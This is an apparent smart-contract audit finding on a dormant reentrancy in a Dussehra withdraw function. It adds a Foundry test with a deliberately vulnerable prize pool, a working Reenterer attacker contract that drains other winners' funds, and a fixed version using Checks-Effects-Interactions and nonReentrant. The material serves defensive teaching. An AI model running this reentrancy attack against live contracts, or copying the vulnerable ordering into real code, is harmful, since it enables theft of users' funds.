The Dussehra::withdraw function should follow the CEI (Checks-Effects-Interactions) pattern. It breaks the pattern by making a state change after the transfer to msg.sender is done, which can allow msg.sender to reenter the function.
The Dussehra::withdraw function does not follow the CEI pattern.
It is violated by the line
which makes a state change after the transfer is done, allowing msg.sender to reenter the function and call Dussehra::withdraw again.
The reentrancy lies dormant in the Dussehra::withdraw function with no real impact for now, since after the initial withdraw the contract is left with no balance. If the contract changed in the future so that it still held funds after the first transfer, there would always be a possibility for msg.sender to reenter the function and steal funds.
Manual Review
Foundry
The Dussehra::withdraw function should follow the CEI pattern, i.e. make the state change before the transfer is done, and use OpenZeppelin's nonReentrant modifier (ReentrancyGuard) to prevent reentrancy.
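The following Foundry test is an added illustration for this finding, not the Dussehra contract or any code from the project. It uses a hypothetical prize pool that, unlike Dussehra, still holds ether owed to other winners when one winner withdraws, which is exactly the "future change" under which the dormant reentrancy becomes exploitable. The names PrizePoolVulnerable, PrizePoolFixed, Reenterer and fund are invented; the test assumes forge-std and OpenZeppelin Contracts v5 are installed (v4 ships ReentrancyGuard under @openzeppelin/contracts/security/ instead). The vulnerable pool makes the state change after the external call; the fixed pool applies CEI and adds nonReentrant as defence in depth.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration, not the Dussehra contract. Contract and function names are hypothetical.
// Assumes forge-std and OpenZeppelin Contracts v5 (v4: @openzeppelin/contracts/security/ReentrancyGuard.sol).
import {Test} from "forge-std/Test.sol";
import {ReentrancyGuard} from "@openzeppelin/contracts/utils/ReentrancyGuard.sol";

/// Vulnerable: the owed amount is zeroed only after the external call (Interaction before Effect).
contract PrizePoolVulnerable {
    mapping(address => uint256) public owed;

    function fund(address winner) external payable {
        owed[winner] += msg.value;
    }

    function withdraw() external {
        uint256 amount = owed[msg.sender];                  // Check
        require(amount != 0, "Nothing to withdraw");
        (bool ok, ) = msg.sender.call{value: amount}("");   // Interaction
        require(ok, "Failed to send money");
        owed[msg.sender] = 0;                               // Effect, too late
    }
}

/// Hardened: Checks, then Effects, then Interaction; nonReentrant is defence in depth.
contract PrizePoolFixed is ReentrancyGuard {
    mapping(address => uint256) public owed;

    function fund(address winner) external payable {
        owed[winner] += msg.value;
    }

    function withdraw() external nonReentrant {
        uint256 amount = owed[msg.sender];                  // Check
        require(amount != 0, "Nothing to withdraw");
        owed[msg.sender] = 0;                               // Effect
        (bool ok, ) = msg.sender.call{value: amount}("");   // Interaction
        require(ok, "Failed to send money");
    }
}

/// Re-enters withdraw() from receive() while the pool still holds enough ether for another payout.
contract Reenterer {
    address public immutable pool;
    bool public lastReentrySucceeded;

    constructor(address pool_) { pool = pool_; }

    function attack() external {
        (bool ok, ) = pool.call(abi.encodeWithSignature("withdraw()"));
        require(ok, "initial withdraw failed");
    }

    receive() external payable {
        // Against the vulnerable pool owed[attacker] is still non-zero here, so the inner call pays again.
        // Against the fixed pool the inner call reverts; record the result so the outer payout completes.
        if (pool.balance >= msg.value) {
            (lastReentrySucceeded, ) = pool.call(abi.encodeWithSignature("withdraw()"));
        }
    }
}

contract CeiTest is Test {
    address constant VICTIM = address(0xBEEF);

    function test_vulnerablePoolDrainsOtherWinners() public {
        vm.deal(address(this), 10 ether);
        PrizePoolVulnerable pool = new PrizePoolVulnerable();
        Reenterer attacker = new Reenterer(address(pool));
        pool.fund{value: 2 ether}(VICTIM);
        pool.fund{value: 1 ether}(address(attacker));

        attacker.attack();

        // Owed 1 ether, walked away with all 3: the victim's 2 ether are gone.
        assertEq(address(attacker).balance, 3 ether);
        assertEq(address(pool).balance, 0);
        assertTrue(attacker.lastReentrySucceeded());
    }

    function test_fixedPoolPaysOnlyWhatIsOwed() public {
        vm.deal(address(this), 10 ether);
        PrizePoolFixed pool = new PrizePoolFixed();
        Reenterer attacker = new Reenterer(address(pool));
        pool.fund{value: 2 ether}(VICTIM);
        pool.fund{value: 1 ether}(address(attacker));

        attacker.attack();

        assertEq(address(attacker).balance, 1 ether);
        assertEq(address(pool).balance, 2 ether);
        assertFalse(attacker.lastReentrySucceeded());
    }
}
```

Run with forge test. Note that the fixed pool would already be safe without the guard, because zeroing owed before the call makes the re-entered withdraw fail its own check; nonReentrant is kept so that the function stays safe if a later edit reorders the statements again.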
The `withdraw` function sends the given amount to Ram. If the attacker calls the `withdraw` function again before the state variable is changed, the function will revert because there are no more funds in the contract. This reentrancy has no impact for the protocol. It is recommended to follow the CEI pattern, but this is informational.